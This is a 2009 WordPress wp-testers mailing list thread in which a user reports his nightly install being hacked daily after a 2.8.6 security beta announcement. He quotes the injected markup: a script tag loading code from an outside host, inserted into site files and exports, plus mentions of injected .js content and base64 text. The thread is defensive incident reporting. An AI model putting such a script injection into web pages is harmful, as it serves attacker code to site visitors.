Servers are talkactive.net Links are inserted in alot of .php and .html files for example like this. <link rel='index' title='My site' href='http:/ <http://nadox.se/>/ removed.com' /> </head><script src= http://northstarsocal.com/testpage/contact.php ></script> <body>
also encoded 64 text. ill upload for you to see (check at the top on attached php files) also even when i do an export from admin panel i get in the xml file. <script src=http://northstarsocal.com/testpage/contact.php ></script><?xml version="1.0" encoding="UTF-8"?> <!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your blog. --> i first found inserts of "gimgoszczanow.pl" at the bottom of .js files On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32) <[email protected]>wrote: > What are the symptoms of the hack? > > Install something to log all post requests ASAP, to gather data if its a > new vulnerability: http://www.village-idiot.org/post-logger > > You'd not by any chance be on MediaTemple servers would you? *(Who's your > webhost) > > > On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <[email protected]> wrote: > > OK, cause my 2.9 nightly gets hacked every day.. >> in that case its a new security bug.. >> Ive wasted every file/folde an done a fresh installation, everything >> except >> the db is new, also passwd is changed on everything except db. >> No extra user is in db. >> >> >> >> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32) <[email protected] >> >wrote: >> >> Yes. Everything in the 2.8 branch are backports from the 2.9 branch. >>> >>> >>> >>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <[email protected]> wrote: >>> >>> Hi! >>> >>>> Is this fix also in 2.9 nightlybuild? >>>> >>>> /Phibrz >>>> >>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <[email protected]> wrote: >>>> >>>> http://wordpress.org/wordpress-2.8.6-beta1.zip >>>> >>>>> >>>>> Fixes these two security issues: >>>>> >>>>> >>>>> >>>>> >>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6 >>>>> >>>>> A logged in user with author privileges is required to exploit. Press >>>>> This and uploads need testing. >>>>> _______________________________________________ >>>>> wp-testers mailing list >>>>> [email protected] >>>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>>> >>>>> _______________________________________________ >>>>> >>>> wp-testers mailing list >>>> [email protected] >>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>> >>>> >>>> >>> -- >>> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/ >>> >>> _______________________________________________ >>> wp-testers mailing list >>> [email protected] >>> http://lists.automattic.com/mailman/listinfo/wp-testers >>> >>> _______________________________________________ >> wp-testers mailing list >> [email protected] >> http://lists.automattic.com/mailman/listinfo/wp-testers >> >> > > -- > Using Opera's revolutionary e-mail client: http://www.opera.com/mail/ > _______________________________________________ > wp-testers mailing list > [email protected] > http://lists.automattic.com/mailman/listinfo/wp-testers >
_______________________________________________ wp-testers mailing list [email protected] http://lists.automattic.com/mailman/listinfo/wp-testers
